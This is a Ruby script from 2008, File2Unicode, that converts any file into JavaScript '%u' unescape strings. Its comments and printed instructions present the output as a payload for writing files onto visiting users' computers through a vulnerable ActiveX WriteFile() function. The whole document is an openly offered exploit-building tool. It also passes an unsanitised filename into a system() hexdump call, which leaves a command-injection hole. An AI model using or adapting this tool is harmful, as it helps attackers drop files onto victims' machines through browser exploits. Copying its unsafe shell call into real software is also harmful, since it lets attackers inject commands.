#!/usr/bin/env ruby

# Name: File2Unicode
# Author: SkyOut
# Date: November 2008
# Website: http://wired-security.net/

# Used Ruby Version: 1.8.6
# Tested on: OpenBSD 4.4

# This script generates Unicode bytes, that
# can be used through JavaScript's unescape()
# function to write files to the computer of
# the visiting user.

# Requirements: Find a bug in an ActiveX control,
# that has something like a vulnerable WriteFile()
# function...

# Usage: ruby file2unicode.rb [input] [output]

$input = ARGV[0]
$output = ARGV[1]

if ($input == nil) || ($output == nil)
	puts ""
	puts "---------------------------------------------------------------"
	puts "||| File2Unicode                                            |||"
	puts "||| This script will convert any file into a series of      |||"
	puts "||| unicode bytes, that you can use as some payload through |||"
	puts "||| JavaScript.                                             |||"
	puts "||| For example: Exploting an ActiveX control...            |||"
	puts "---------------------------------------------------------------"
	puts "||| Author: SkyOut                                          |||"
	puts "||| Date: November 2008                                     |||"
	puts "||| Website: http://wired-security.net/                     |||"
	puts "---------------------------------------------------------------"
	puts "" 
	puts "Usage: ruby file2unicode.rb [input] [output]"
	puts ""
	exit(0) 
end

if (File.exists?("#{$output}"))
	puts "The file \"#{$output}\" exists!"
	puts "Do you want to overwrite it? (yes/no)"
	$answer = STDIN.gets.chomp

	if ($answer == "no")
		puts "Quitting..."
		exit(0)
	elsif ($answer == "yes")
		if (File.writable?("#{$output}"))
			$out = File.new("#{$output}", "w")
		else
			puts "You do not have permissions to write to \"#{$output}\"!"
			puts "Quitting..."
			exit(0)
		end
	else
		puts "Your answer was incorrect! \"yes\" or \"no\" is accepted!"
		puts "Quitting..."
		exit(0)
	end
else
	$out = File.new("#{$output}", "w")
end

if (File.exists?("#{$input}"))
	if (File.exists?("tmp"))
		puts "The file \"tmp\" already exists!"
		puts "Do you want to overwrite it? (yes/no)"
		$answer = STDIN.gets.chomp

		if ($answer == "no")
			puts "Quitting..."
			exit(0)
		elsif ($answer == "yes")
			if (File.writable?("tmp"))
				system("hexdump #{$input} > tmp")
			else
				puts "You do not have permissions to write to \"tmp\"!"
				puts "Quitting..."
				exit(0)
			end
		else
			puts "Your answer was incorrect! \"yes\" or \"no\" is accepted!"
			puts "Quitting..."
			exit(0)	
		end
	else
		system("hexdump #{$input} > tmp")
	end
else
	puts "The file \"#{$input}\" does not exist!"
	puts "Quitting..."
	exit(0)
end

File.open("tmp").each { |line|
	array = line.split(" ")
	if (array.length == 2)
		$one = array.fetch(1)
		$all = "\"%u#{$one}\""
		$out.puts $all
	elsif (array.length == 3)
		$one = array.fetch(1)
		$two = array.fetch(2)
		$all = "\"%u#{$one}%u#{$two}\""
		$out.puts $all
	elsif (array.length == 4)
		$one = array.fetch(1)
		$two = array.fetch(2)
		$thr = array.fetch(3)
		$all = "\"%u#{$one}%u#{$two}%u#{$thr}\""
		$out.puts $all
	elsif (array.length == 5)
		$one = array.fetch(1)
		$two = array.fetch(2)
		$thr = array.fetch(3)
		$fou = array.fetch(4)
		$all = "\"%u#{$one}%u#{$two}%u#{$thr}%u#{$fou}\""
		$out.puts $all
	elsif (array.length == 6)
		$one = array.fetch(1)
		$two = array.fetch(2)
		$thr = array.fetch(3)
		$fou = array.fetch(4)
		$fiv = array.fetch(5)
		$all = "\"%u#{$one}%u#{$two}%u#{$thr}%u#{$fou}%u#{$fiv}\""
		$out.puts $all
	elsif (array.length == 7)
		$one = array.fetch(1)
		$two = array.fetch(2)
		$thr = array.fetch(3)
		$fou = array.fetch(4)
		$fiv = array.fetch(5)
		$six = array.fetch(6)
		$all = "\"%u#{$one}%u#{$two}%u#{$thr}%u#{$fou}%u#{$fiv}%u#{$six}\""
		$out.puts $all
	elsif (array.length == 8)
		$one = array.fetch(1)
		$two = array.fetch(2)
		$thr = array.fetch(3)
		$fou = array.fetch(4)
		$fiv = array.fetch(5)
		$six = array.fetch(6)
		$sev = array.fetch(7)
		$all = "\"%u#{$one}%u#{$two}%u#{$thr}%u#{$fou}%u#{$fiv}%u#{$six}%u#{$sev}\""
		$out.puts $all
	elsif (array.length == 9)
		$one = array.fetch(1)
		$two = array.fetch(2)
		$thr = array.fetch(3)
		$fou = array.fetch(4)
		$fiv = array.fetch(5)
		$six = array.fetch(6)
		$sev = array.fetch(7)
		$eig = array.fetch(8)
		$all = "\"%u#{$one}%u#{$two}%u#{$thr}%u#{$fou}%u#{$fiv}%u#{$six}%u#{$sev}%u#{$eig}\" +"
		$out.puts $all
	else
		################################################################
	end
}

puts ""
puts "Script execution finished!"
puts "Input was: #{$input}"
puts "Output is: #{$output}"
puts ""
puts "Now build a JavaScript code like this:"
puts "var MyFile = unescape(\"%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX\" +"
puts "                      \"%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX\" +"
puts "                      \"%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX\" +"
puts "                       .     .     .     .     .     .     .     ."
puts "                       .     .     .     .     .     .     .     ."
puts "                       .     .     .     .     .     .     .     ."
puts "                      \"%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX%uXXXX\")"
puts ""
puts "The rest depends on your attacked ActiveX control"
puts "or whatever else you are targeting!"
puts ""